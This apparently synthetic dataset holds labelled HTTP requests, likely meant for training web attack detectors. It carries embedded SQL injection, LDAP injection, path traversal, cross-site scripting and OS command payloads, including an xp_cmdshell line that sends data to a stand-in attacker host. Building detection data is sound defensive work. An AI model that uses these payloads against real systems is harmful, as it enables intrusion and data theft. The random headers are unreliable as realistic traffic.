If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 8765
MIME-Version: 8.8
Pragma: ii='6EaE'
Proxy-Authorization: Basic b3JoaWlzczowbjVuZWlP
Authorization: NTLM ZmVvdXRqOXJldGhDeDBpdDJvY25zaWZ0Yml3cnR0bEk=
Range: -9299
Referer: http://jezs.st/htadteSi/oeld6yat/Ns5nho.bin
TE: gzip
Trailer: Expect
User-Agent: Mozilla/8.6 (Windows; U; Windows NT 4.9; iN-or; rv:6.2.3) Gecko/68168919
UA-CPU: MIPS
UA-Disp: 962,664,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8264x986
Via: 3.3 62.32.90.167, 3.2 252.83.1.73
Transfer-Encoding: deflate
Upgrade: oui/8.3, tn8/9.7
Warning: 932 195.72.254.121:53 "lnpgreue" "Fri, 16 Oct 09 14:01:22 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42558
Start - Id: 37086
class: LdapInjection
GET /ihf0Ng_-vw/5lCc@.Fiframef7DwL/0Q@z0d9NWSiP/h_DbUDOCl9Ej/shutdownZZd8FiJOnph-LE@-/open@_TP8y8H/EGLVacKjsock_stream5-xQv/.6@@7access_log3.gif?e9acmdBtK4=sEfaq&xhzm=annHGj&RqKnJcV=%29+++%28+%7C++++%28eetto%3Dnh*%29&clihs=6612204&wTXZ5D8=%27ta HTTP/1.1
Host: 11.97.218.249
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 43.147.155.41
Cookie: eecqars=dtdncTB;ertyjae=nd;fy0mpt=7;klw2x4eks_=86965941;H1dsed3ariae2n=706462737;3smseiriRoae=47
Cookie2: $Version="90"
Date: Mon, 21 Mar 05 18:41:13 GMT
ETag: W/"6XnwelmSxPa-Kd5"
Expect: 100-continue
From: 0res@4luu6h.st
If-Modified-Since: Wed, 28 Sep 05 09:23:58 GMT
If-Unmodified-Since: Wed, 14 May 08 09:03:00 UTC
If-Match: *
If-None-Match: *
If-Range: "zMWW.uWKOQ5q4wxSu"
Max-Forwards: 05
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: Basic MmFnY2FlOmR0ZVNpZDhh
Range: -5
Referer: /tdtrsirA/f7s0qotn/eatts/r4cateEp.asmx
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.3 (Windows; U; WinNT 7.1; eh-ho; rv:0.5.5) Gecko/41532144
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7857x018
Via: HTTP/2.4 www.9nee.js
Transfer-Encoding: deflate
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 997 www.raeb.htm "tslwaeaovnN5em24i" "Fri, 27 Jan 06 03:45:51 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 252851
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37086
Start - Id: 42041
class: SqlInjection
GET /A1RYqzx2nH/qb_QOANq.cgi?t9nk6d=-r%7E+W&re3eceni6exd=%40myqo&wLwm=5Hfc&inrepu=ieizlteq8Ssei3gzt&otte=iframetcseetYehtslp&siH=having4f+sewLhe5+servicesr9&sla=%27+%2F**%2F+OR+++%2F**%2F%27%27%3D++%27&Sir3VPTEID=3487753496 HTTP/1.1
Host: 222.29.15.109
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 80.172.139.192
Cookie: fnrtdgrnlaasei=a 5d
Cookie2: $Version="633"
Date: Fri, 22 Sep 06 15:32:12 CET
ETag: "wcne.To77bHV22Xl8aXt"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Thu, 30 Jun 05 19:50:11 GMT
If-Unmodified-Since: Tue, 17 Feb 04 09:38:48 CET
If-Match: "VfEM8frSXO.2ibpbdK9"
If-None-Match: *
If-Range: *
Max-Forwards: 87
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: 5heq iYitkt=3sapN
Authorization: Digest response="859b51C4AfBb44A1bAaFB219Eeb03cac"
Range: -7
Referer: http://www.1onegrg.be/rhesi/ssegtdEl.php
TE: deflate;q=0.5
Trailer: Accept
User-Agent: b5mtewhso/9.8
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 422x9399
Via: HTTP/7.4 148.27.16.62
Transfer-Encoding: 9sidq; v4oyRNt=rnxsdz1s
Upgrade: hUrier/3.1, imsa/1.4, hntw/4.9
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 183.45.204.126
X-Serial-Number: 78968713276550254
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42041
Start - Id: 43637
class: OsCommanding
PUT /n@p_kBbzCqN/4bLZ/97/hK41inhEG6T/d8nae2e/etltrgrsoe/vEhSdh/estu6hoh.shtml? HTTP/1.0
Content-Length: 148
Content-Language: A2GEuhG,oszl,Th
Content-Encoding: identity
Content-Location: http://www.reehKn.org/ase7/rtdl/etvinna/urneiot/srgt.htm
Content-MD5: aGFic3N2V05tU3NzZ3Vubg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Jul 09 09:22:57 CET
Last-Modified: Tue, 21 Jul 09 03:12:24 CET
Host: www.ICsstTp6.net
Connection: close
Accept: video/*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.9, compress, identity;q=0.4, identity, deflate
Accept-Language: ai5oT-ia0rb, hap-lnaarnee;q=0.9, tsRl-stn;q=0.3, t-egr, il-buLet4
Cache-Control: no-store
Client-ip: 12.237.189.186
Cookie: lnsnE=\n   uftp    -p     www.raelmeis.com   /gemari/geetistrtr/atntat/laicns/te/meol;gc=nujUDodNnOx;ydctieiirecgi=439136
Cookie2: $Version="442"
Date: Thu, 09 Sep 04 19:34:43 GMT
ETag: "Km9KkeZ1jS7hNoxI"
Expect: 100-continue
From: yroEOt@rszce.uk
If-Modified-Since: Wed, 05 Mar 08 18:01:56 UTC
If-Unmodified-Since: Mon, 23 Nov 09 20:11:32 CET
If-Match: *
If-None-Match: "k3L.hwTXs8pydPRz7ex"
If-Range: Fri, 29 Jul 05 03:14:21 GMT
Max-Forwards: 8
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest nc=fEaDc1Fe
Authorization: Basic MnJmdHJraTowa3RhbWVo
Range: -434314
Referer: /sdiamt/sHsonRUn.exe
TE: trailers,chunked;q=0.7,gzip
Trailer: Cache-Control
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 1.5; rn-ln; rv:2.3.2) Gecko/56642097
UA-CPU: StrongARM
UA-Disp: 476,942,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7102x9023
Via: FTP/9.4 www.aroesiea.gif
Transfer-Encoding: Idset
Upgrade: aeuqd/0.3, o8uees/6.6
Warning: 587 www.het8r1.gif:387 "tdreuBf" 
X-Serial-Number: 27341015070784
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6rl5nwaildoi=tTicg&cr=oaSfan3smetaySv&purjnziqEoaoel=0931334&rtbbcomiehrm=likeoe&EDtlibv8=iiueueru>ltnN&lCoo=une&klzSgeineuno9s=sne1eoee6:lz xp_

End - Id: 43637
Start - Id: 45518
class: PathTransversal
GET /28GgyB86j/fXergatgdtf2iaAro/giYJWLKaB/auia/b7teerdotatlrMk/sdcUNscstonh/sRYhl6jU24/7%uservices2shutdownXYdecopy/c@JIhtpassyil0qIk/ef_HYdoh9V5rE7l/5o3l3exsorpfacroio.jpg?YMx9kYd8L=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fleet%2Fchmaan%2Ftoliretoet%2Folveolilsi.swf HTTP/1.1
Host: 26.178.135.201
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese;q=0.6
Accept-Encoding: gzip, compress, deflate;q=0.7, deflate
Accept-Language: tialp-d6oan;q=0.6, pa-9lef, sot-asb;q=0.7, g8-fytumh;q=0.6, ii-7;q=0.5
Cache-Control: no-transform
Client-ip: 247.212.53.148
Cookie: toa7wssnaVmennF=nwddqmSwqP;rmeZg6k=928904;sam8D93passthruAQxbg=17;387eaNdEeTic=H saesoinsert ;Pupdatelm;1secnglC7eotpmn=iLbx
Cookie2: $Version="37"
Date: Fri, 20 Jan 06 02:35:44 UTC
ETag: "cLx8FTIZFHq_bQt6l"
Expect: ngo6Mwsy
From: t2hldl05@oephweoTmr.de
If-Modified-Since: Sat, 03 May 08 11:45:45 UTC
If-Unmodified-Since: Mon, 01 Jun 09 09:15:42 GMT
If-Match: *
If-None-Match: "oen84j4NYduFR_BRKfWo"
If-Range: *
Max-Forwards: 12
MIME-Version: 9.8
Pragma: nO='aegsLE'
Proxy-Authorization: NTLM bm41ZTRwbnFya2lxbnJ0aGR0RXQwZTVpc05zNGR0ZXJ5cnBvY2ZkZnNu
Authorization: Digest qop=auth
Range: 55569-482846
Referer: /seiueae2/xdase/hbnEes.mp3
TE: gzip,trailers
Trailer: Accept
User-Agent: Mozilla/9.2 (compatible; MSIE 4.9; Unix; kOartns; Raouecep; brokoo)
UA-CPU: 68000
UA-Disp: 9630,820,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2096x915
Via: FTP/3.0 www.LeraSla.css
Transfer-Encoding: compress
Upgrade: sJn/9.5, owof/5.6, ooi/5.8, beto/7.5
Warning: 262 www.yptv0dez.html "oibr8oPRotpdsee8a7ax" "Fri, 17 Aug 07 06:53:24 UTC"
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45518
Start - Id: 37422
class: LdapInjection
GET /543M3YbhH/efeceeeiM6VSsdZtray/IautoexecqqCwn/wbpN8W/mMJKsglK/eaejaeuS8tw2thOftn/NGJ@QEky5JdJ/illX2PwT_uKrnJ/ldhb/szyD2qDJYWya4xI/a4RQi@4TeB9NjzDfG_WL/7LL@4WsymVLG-dlyCT.mspx?rhwpy=28479&lmshA2bt=4&ogtIzottAsaon0=u8si&8tsdoxGn=rjtxAg&t6satouqlwrrnwz=c.b&MdX.l-2IF1D=5h6ltree&rimoeii=176068150&etenmimt55Vp=in HTTP/1.1
Host: www.HrNstETgot.uk
Connection: sn2ieent
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: Nyaesji=sNdSac9e
Client-ip: 66.200.163.45
Cookie: Efconnecty1MXo=1201;yaoit00go2teT=tg_XmVK4poJ;a5esIle4ruetgu=ln:r1&es&;0rf4nqudh34l9xg=971)(&(objectClass=Aiw)(|(sn    = sy)(cn=at J*))
Cookie2: $Version="5"
Date: Thu, 03 Jul 08 01:31:07 CET
ETag: "C@98EvtiO592TgAoYGM"
Expect: pjThdhds
From: eda9Oyew@bfisXrie.cz
If-Modified-Since: Sun, 24 Oct 04 07:54:22 CET
If-Unmodified-Since: Wed, 10 Mar 10 21:37:32 CET
If-Match: "8-@tgH9JqLQdB0r2lD"
If-None-Match: "HMIGeZJILF4WSMd"
If-Range: Wed, 04 Mar 09 09:21:38 GMT
Max-Forwards: 504
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: aeo57j 1iate=ahmbRee
Authorization: NTLM eWZudDlvc2lwdHBpczg2d21hVHN6dTF1bTlyZTZncW5laXNob2Fnc3JnZW55RDI=
Range: -84
Referer: /ntMoDe.pl
TE: gzip;q=0.5,chunked
Trailer: Via
User-Agent: dsnwrhaueleiieofdzn
UA-CPU: Sparc
UA-Disp: 952,5448,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 359x5733
Via: FTP/2.6 www.xpnmhs.css:0370
Transfer-Encoding: gzip
Upgrade: ere/7.9, een/7.9, i8ed/9.2, 1Dq/4.6
Warning: 235 143.206.161.131:00127 "yjo6bijuuoe" "Mon, 10 Nov 08 02:40:27 GMT"
X-Forwarded-For: 44.141.186.180
X-Serial-Number: 1007301637
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37422
Start - Id: 35365
class: SqlInjection
GET /rD54VrfMceWY/aavIetc/tN/sxI6PCfcK.s1I_hxoJ4/lHDYhOt/76etcXY7oKflibTsnmB/0hcYXKWxD-8L.dll?bDVcuY-inputFhk=eE%5CrakahxrOje+ntmpj&mdcWI=snaeaou8dcetke2lie&USPVxLZi3Jk=3catas&tieulcOl=%3E%24i+t&yro8wa3wdvm=%5C%40en7&W.ebYnpX=uHnoeswaf%27%29%3B++++DEL%2F**%2FETE+++FROM+++users+++WHERE++upper%28username%29++%3D++++upper%28+%27admin&eaae8rderdiegtt=enw&fc5zLI=10&nnsee8Na4NlT=n91m%7C&yR.t=sDttea0o2irpsvash&eiai3phlH7aoid=passwda HTTP/1.0
Host: www.a9tLntihUc.net
Connection: close
Accept: */*
Accept-Charset: x-mac-ce, iso-8859-1, x-mac-hebrew, windows-1258;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: roe-d35s;q=0.2, e-D2j, irf9n3ss-uushnk;q=0.2, 7eieiot-ehruno
Cache-Control: max-stale=08828
Client-ip: 46.92.128.38
Cookie2: $Version="3"
Date: Mon, 24 Jul 06 17:24:23 UTC
ETag: "hOfZpQKb4lvYuJI"
Expect: 06leorna
If-Unmodified-Since: Sun, 17 Jun 07 09:06:44 GMT
If-Match: "A_WZkwGMR@Gk.@a"
If-Range: *
Max-Forwards: 6
MIME-Version: 9.1
Pragma: no-cache
Authorization: N9er ltrrow=80sdtd
Range: 187-
Referer: http://Wdur98.com/omhe.swf
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/2.5 (Machintosh; U; Mac OS X 3.3; Tm-un; rv:6.1.3) Gecko/78111013
UA-Pixels: 1597x768
Via: HTTP/5.3 www.lechcS.htm
Transfer-Encoding: compress
Warning: 105 www.e4siinia.jpeg "yeoeae8edtaeehqtNems" 
----: --------------------------------------------------

null

End - Id: 35365
Start - Id: 38055
class: LdapInjection
GET /ng0eh1/hegnrAmsnt/@2/sPGP9gQ2mq/eUJqMRpKha.ze/StnviriewiMheaete/s.@IC17emMF/lQyc-Nc0/uoinsertZmebJinput@/wHkFO_XH/Y9T/nwohs5d.jpeg?fowel=8458&6set2oazufENaaI=y&9eneno0=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 198.1.66.209:80
Connection: close
Accept: */*
Accept-Charset: big5
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 26.50.164.170
Cookie: ci3SNkutH2Kvse=rstprocessing-instructionA1F=echoa;f4eest=t:D(u8l ohu;ess=d0a7hpi8n
Cookie2: $Version="7"
Date: Tue, 19 Oct 04 02:32:05 UTC
ETag: "ySki1eLrvU0jkU0tWS44"
Expect: oTo0xsi=menaree;nEnewski
From: eoMt7@ridEmrif0e.it
If-Modified-Since: Sat, 18 Oct 08 09:55:06 UTC
If-Unmodified-Since: Sun, 27 Jun 04 20:53:02 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 26 Jun 04 15:35:05 CET
Max-Forwards: 4
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest realm
Range: 6583-,350-4,-7502
Referer: http://www.hltem.be/stdetcy/hedsa5.html
TE: deflate
Trailer: Warning
User-Agent: Mozilla/6.2 (Machintosh; U; PPC 6.7; 64-tp; rv:0.2.8) Gecko/13118332
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: HTTP/8.5 84.184.105.4, tiEx/2.7 243.14.254.23:7, lle/6.3 www.odrts4j.jpg
Transfer-Encoding: Lhss; ldcrX=atcagmta
Upgrade: uw5/3.9, vdsth/9.5, so4/9.1
Warning: 825 116.151.251.79:4332 "d7aga7herbaA" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 94095568311644
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38055
Start - Id: 41282
class: SqlInjection
GET /sjf3ei/nttOrYtxP.B1o7aSic.html?dtt=bM012vG3&k@0acceptkSR_bJM4=1670&axuybepr=+an9&iRine7nae=%5Cs98g&eelrk=12747566 HTTP/1.1
Host: www.aesia.st
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: koi8-r, cp-936, iso-2022-kr
Accept-Encoding: 
Accept-Language: encweg5-ksrro5i;q=0.9, eie-Oeew;q=0.5
Cache-Control: max-stale
Client-ip: 113.199.127.66
Cookie: h9mLdnrn=yztnypo'     UNION    ALL    SELECT  Eias     FROM oudjiM   WHERE ''  =  '
Cookie2: $Version="7"
Date: Thu, 31 Aug 06 08:04:53 UTC
ETag: W/"DRkLwuvu5ed6v-FEJe"
Expect: moddX
From: ro7Ie@oae4.net
If-Modified-Since: Fri, 26 Mar 04 20:49:02 GMT
If-Unmodified-Since: Tue, 01 May 07 08:15:23 CET
If-Match: "G-Vfzxy1L23Eudn@uC"
If-None-Match: *
If-Range: Fri, 03 Jun 05 02:56:01 UTC
Max-Forwards: 07
MIME-Version: 9.5
Pragma: seha=kthsx7J
Proxy-Authorization: Digest response="06adE389DD89eaA89fca7Fe0Bdadae8f"
Authorization: NTLM djBlcG5oNmFkbnRFRXA5dGhuY2h3bWVkd3RocWhkbWVlOHlobHVzamFuM2VveA==
Range: 2-,-01
Referer: /kima8t.msf
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/6.5 (compatible; MSIE 0.9; Unix; r6aMM; nihh)
UA-CPU: StrongARM
UA-Disp: 9589,777,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1296x4154
Via: 9.6 www.5nseruo.png, 1.8 www.eamtr.html
Transfer-Encoding: 3Dqn
Upgrade: ieqh/0.4, 4uiue/9.2, dPM/0.9
Warning: 025 www.ntehe.png "OnnaaESsKoazNs" "Wed, 06 Feb 08 14:08:30 CET"
X-Forwarded-For: 7.111.55.106
X-Serial-Number: 489994179752
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41282
Start - Id: 36137
class: PathTransversal
GET /rIQbLTRv9nqGYrxKnk/Jont/h.WqNpDo-DO7o/yShCXE@E2hSJ/iL__iJOMp44@eV-.T/seqnceIvboHhtneSia/eHL2/ngtie4/80nrOasnbnilnu.jpeg?lat0zseekodr=nr+r%40f1es&cgdiasoe7=09&weheuN3i=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&9xOUcfPNn2Y=documenti%3Fi%29lie%24oe1t&r71usssea=aR%3Do%5D&shswhcefc=2&ckgnac8=R3en%5Cpjr%2Ffdrvges&ou4dieoqfe2eeb=dqq+DEveceo&endcI=pnc3m4&group byzPhJN=65045522&Ekiotntt=27&nodeL6amOchildWK1sj=sunion&hszaapasyoec=kTan5c&loxSbs=69130 HTTP/1.0
Host: 216.165.16.90
Connection: close
Accept: video/quicktime, audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=3
Client-ip: 124.16.56.219
Cookie: l-wgetlycSn=57951211;ttp8bTsrrdnoA=%;7snph-YbPWn=nWS1KJW6YJ;melsliuorttj7Me=nzv;3ewdn4merirrf=etchr
Cookie2: $Version="150"
Date: Sat, 30 Jun 07 09:21:05 GMT
ETag: W/"eFAEGFJtDEm80bv04liq"
Expect: ieg5
From: rkCarar@2euo7u.cz
If-Modified-Since: Sun, 09 Nov 08 23:01:42 GMT
If-Unmodified-Since: Sat, 10 Oct 09 11:05:22 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Mar 07 14:00:48 UTC
Max-Forwards: 072
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest cnonce="ytnvfcr"
Range: -535722,74763-864722,-62713
Referer: /yrhg/i19b7pi/xnnSlia/hsiwfdri.mdb
TE: trailers
Trailer: Proxy-Authorization
User-Agent: antvt (fPTR-@)
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 795x647
Via: HTTP/2.8 www.ss6trpo.htm, FTP/0.9 12.179.167.63:0605
Transfer-Encoding: gzip
Upgrade: n1LC/2.0, d6dsi/4.8
Warning: 565 www.Stne8T.html "eAh6" "Thu, 04 Dec 08 18:59:50 UTC"
X-Forwarded-For: 129.108.57.155
X-Serial-Number: 6486734154619358
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36137
Start - Id: 46256
class: PathTransversal
GET /soUaGiJHtI/c0eyahteCezhisrnn7/tjHE/dsorg1otth/doiioeitm1riKn/5GMv-5fEb/nycmti0ee/pNFa_jGar_fb8be/pqsnrnNneeBe/EA8.zkvarm/ebuxyJljNAwGR/randinputrHmJ.exe?nsIl=6183&FgG9mBJ=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html HTTP/1.0
Host: www.tseaa3s.net:238
Connection: keep-alive
Accept: video/quicktime, audio/x-wav, video/mpeg
Accept-Charset: x-mac-greek, iso-8859-8-i
Accept-Encoding: *;q=0.0
Accept-Language: y-iette;q=0.1
Cache-Control: no-cache
Client-ip: 190.79.101.95
Cookie: l6oOue=lnK6E
Cookie2: $Version="7"
Date: Mon, 14 Nov 05 17:21:37 CET
ETag: "_9L1EBmUlyekels"
Expect: tmde9whr
From: o8nret@EbsFqo4s.st
If-Modified-Since: Thu, 19 Oct 06 21:49:57 UTC
If-Unmodified-Since: Sun, 13 May 07 06:33:10 UTC
If-Match: "Xa02q5HN@zg50h0"
If-None-Match: "sLmj3ROUKuDqC0iagaJ"
If-Range: Sun, 14 Jun 09 10:23:41 UTC
Max-Forwards: 9
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: NTLM dDJOdDA2dGZhcExXZTBlYXNlMnJhcmVwYWhlYVM4bkFjaWJkdA==
Range: 5263-
Referer: /onhqg/eofd.exe
TE: trailers,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/3.7 (compatible; Asimne; Linux i386; V2esn0)
UA-CPU: 68000
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: 0.7 192.255.190.248, 7.4 8.3.9.66:0964
Transfer-Encoding: compress
Upgrade: roeie/1.4
Warning: 961 59.212.87.203:1 "2ryq" "Mon, 19 Mar 07 07:17:54 UTC"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46256
Start - Id: 46607
class: XSS
GET /oveqeLn/aupfaedvs/ctd/o3soetahaz/r5rsqbnstrn/aetaecemwh/omQyeCaaal1teIoi/sfGovTleA.jpeg?e0h=ndIemna&UspFJi=an&IstsH0wmoi06o=wadscnmk&SfAcsoa=aa4noesystem%24ue%5Dngpo&tnuso8=+winnt1wgetreua%3A%3B4%7Chybhttp&lr=inob HTTP/1.1
Host: www.ReSh.cz:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1253;q=0.2
Accept-Encoding: identity
Accept-Language: *
Cache-Control: max-age=2749
Client-ip: 151.185.246.142
Cookie: rcmdOeselpqe6ib=ehttahnafc;hYt5rcpMm7exec=fQh;izte9=1714;5hneaaesrmz4iut=2ohuhlm0gswoimAe
Cookie2: $Version="22"
Date: Wed, 10 Mar 04 22:54:06 UTC
ETag: W/"i1SzQL9_A_G6IGY"
Expect: 100-continue
From: cmafia1u@4a9he51St.com
If-Modified-Since: Sun, 19 Jul 09 18:13:17 GMT
If-Unmodified-Since: Sat, 03 Dec 05 06:20:49 UTC
If-Match: "azZgVZ@U8xVGB46nAqRs"
If-None-Match: *
If-Range: *
Max-Forwards: 13
MIME-Version: 0.9
Pragma: a=Tsi
Proxy-Authorization: 8ree itGr=mITonrat
Authorization: Basic cm9oZXRpcjptdW9v
Range: 29-,197659-,4-7273
Referer: http://www.eus2.com/ndduyha/7nzUp/vsimIee.png
TE: chunked;q=0.0,deflate;q=0.9
User-Agent: iOmom"  ><body%20onload=alert(document.cookie);   >
UA-CPU: x86
UA-Disp: 7714,181,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 950x529
Via: w4u/1.8 140.252.20.223, 1.5 www.pStTte.htm:272
Transfer-Encoding: deflate
Upgrade: 1ssnt/2.7, Necil/0.4
Warning: 105 192.184.242.29 "Ttdmeee" 
X-Serial-Number: 1492216071266742097
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46607
Start - Id: 41175
class: SqlInjection
POST /xef/g15VppfLDiufJ3jtNt/cet0ch/l9e5e4okasdrEcchale/nYrb_RN6KYOPrWedEk9U/xtermgNfAAw23/dlnlmesceoadnedoo/himh/e0av4xFSwWQ.pl? HTTP/1.1
Content-Length: 73
Content-Language: t
Content-Encoding: identity
Content-Location: /reni5/onynO/ruIe7l/sjmotwg.jsp
Content-MD5: M2lhSGJkc0ZhdHN0dHlpcA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Feb 04 15:40:33 GMT
Host: 194.61.48.28
Connection: close
Accept: image/gif;q=0.8, application/postscript;q=0.5
Accept-Charset: hz-gb-2312;q=0.8, macintosh;q=0.6, windows-1254, x-mac-arabic, shift_jis
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 51.68.183.210
Cookie: bhmdns4ili=elRkw16yUWdJ;GPiselecta02=exec   xp_cmdshell  'bcp  "select     *  from   jt"    queryout pwdump.exe   -c -Craw  -Shackersip  -Usa  -Ph8ck3r'
Date: Sun, 04 Oct 09 23:58:39 CET
From: oo3kue@eedsr.st
If-Unmodified-Since: Mon, 28 Apr 08 19:26:36 GMT
If-Match: "3B7QVIpGUaMPuBU.g3l"
If-None-Match: *
Max-Forwards: 3
MIME-Version: 6.7
Pragma: no-cache
Authorization: Basic ZWxlZXR2OnRya3RzYQ==
Referer: http://Zs9vye.uk/lfnkd/iLlStzie/eerP/4dItf.bin
User-Agent: maDnfibnpHwgttZA

P4mailpnc-=exK-siEy49at54&eEbn=2923056&cSsa9a=oSau&ng89=ogsohttpEautoexec

End - Id: 41175
Start - Id: 43636
class: OsCommanding
PUT /ej3cS5u/aE3nyMXrOaAnfzOaN_/dbsho1issrt4u/siaxacettdrmTpjxrktm/iscntt/tA-tDhxnA_z/tYsnnnie0uhfc7ueDpgx/t5ak5aeereereyhaq/5n1mnncdnqttox.aspx? HTTP/1.0
Content-Length: 131
Content-Language: cr1
Content-Encoding: compress
Content-Location: http://ehce3n.st/lokodans/ednpBa2a.htm
Content-MD5: YW1ocmh1b2JhbGFlejNtWQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 14 May 06 20:13:37 GMT
Last-Modified: Tue, 21 Jul 09 03:12:24 CET
Host: 252.109.223.226
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: I8tc-aeH;q=0.4, gaA-iake;q=0.7
Cache-Control: no-transform
Client-ip: 157.21.58.178
Cookie: stmj=ls     -las     /home/   |;srsa=18
Cookie2: $Version="442"
Date: Thu, 16 Mar 06 14:24:51 GMT
ETag: W/".QW9ECthMnGGMsec"
Expect: 100-continue
From: te5tbp@ctle.uk
If-Modified-Since: Thu, 09 Apr 09 15:58:13 UTC
If-Unmodified-Since: Sat, 19 Apr 08 17:46:46 GMT
If-Match: *
If-None-Match: "9ew0m7Ka.79E@uBUhc.r"
If-Range: Tue, 18 Sep 07 06:23:06 UTC
Max-Forwards: 241
Pragma: no-cache
Proxy-Authorization: Basic bFRDZGhvZWU6a0FvTg==
Authorization: NTLM aW9odWFuRWlyb2hvdGxucWw3c2ZnZlNPc2l1cGNPZWJlc2FlNXJlM3lMbm9wM3U=
Range: -434314
Referer: http://aopyw5r9.it/dfArtmde.php4
TE: trailers,chunked,gzip;q=0.7
Trailer: Cache-Control
User-Agent: ontesTs/9.9.4.2.3
UA-CPU: StrongARM
UA-Disp: 7880,0277,8
UA-OS: Windows 95
UA-Pixels: 7102x9023
Via: FTP/1.6 4.211.166.252, 9.4 www.wtf0.jpg:6, FTP/0.2 140.202.57.187
Transfer-Encoding: Idset
Upgrade: uo6soo/4.0, tv5/1.7, erf/7.9
Warning: 587 www.het8r1.gif:387 "tdreuBf" 
X-Serial-Number: 27341015070784
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aAiordt=optvara9Q&hAsomnot9oo5fsr=0\ji2heo&QallQbetweentiperlYlikexp_o=cx&swceYanue8rei=qn&AhedRsgen=eepkarnksl7ety&daUIyMY=39561

End - Id: 43636
Start - Id: 42434
class: SqlInjection
